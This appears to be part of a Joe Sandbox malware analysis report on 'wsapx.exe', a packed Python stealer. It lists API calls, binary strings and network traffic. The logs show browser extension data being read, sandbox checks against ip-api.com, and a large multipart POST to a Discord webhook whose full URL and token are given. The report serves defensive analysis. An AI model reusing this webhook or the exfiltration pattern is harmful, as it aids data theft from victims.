              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 0000006E.00000000.2528171463.00007FF60E630000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: wsapx.exe, 00000002.00000002.2670091498.00007FFDA33E1000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7C71B83B0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,0_2_00007FF7C71B92F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,2_2_00007FF7C71B92F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7C71B83B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,110_2_00007FF60E5E46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E6288E0 FindFirstFileExA,110_2_00007FF60E6288E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF60E5DE21C
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: blank-5eoty.in
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 731042User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=0faf40e5cd1f1931bdb8b0465c783544
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 07:38:06 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734075487x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4lllrWnMiPrHeZ3hKh5y1SCJz5d9pCBQSw7m1rePD9qkRF5P0A8nYrAcLtSpqV726obINY31CIdI6NlQG1V3pMGyA5tVsJ8lUVZq%2FmobiLUJ8quIRCmHsarj%2BDaQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=4a3d3e501b1e2428812603716b0f256d8644b9af-1734075486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=9cJeKDbCz.ZFeL4K6jS.s_pRajFY0tKlwFpKAskX.VA-1734075486542-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f144ae79dee7d26-EWR
              Source: wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi6
              Source: wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
              Source: wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co6
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: wsapx.exe, 00000002.00000002.2653951316.000001C879FFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2656467781.000001C87AA63000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2326531713.000001C879FF4000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C879FF3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652665034.000001C879A30000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651244199.000001C877C51000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2363604883.000001C87A000000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2644095050.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2334422386.000001C879FF4000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2296799517.000002A243070000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2508081777.000001FAEB640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: wsapx.exe, 00000000.00000003.2152239767.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A0863C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: _hashlib.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: wsapx.exe, 00000000.00000003.2148798115.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149091073.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148327844.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150381202.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148926575.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152412963.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148557880.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149277761.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2151201256.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2149184573.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148442290.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152239767.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2148711181.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000000.00000003.2152644309.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: edb.log.23.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingrz
              Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingrzr
              Source: powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
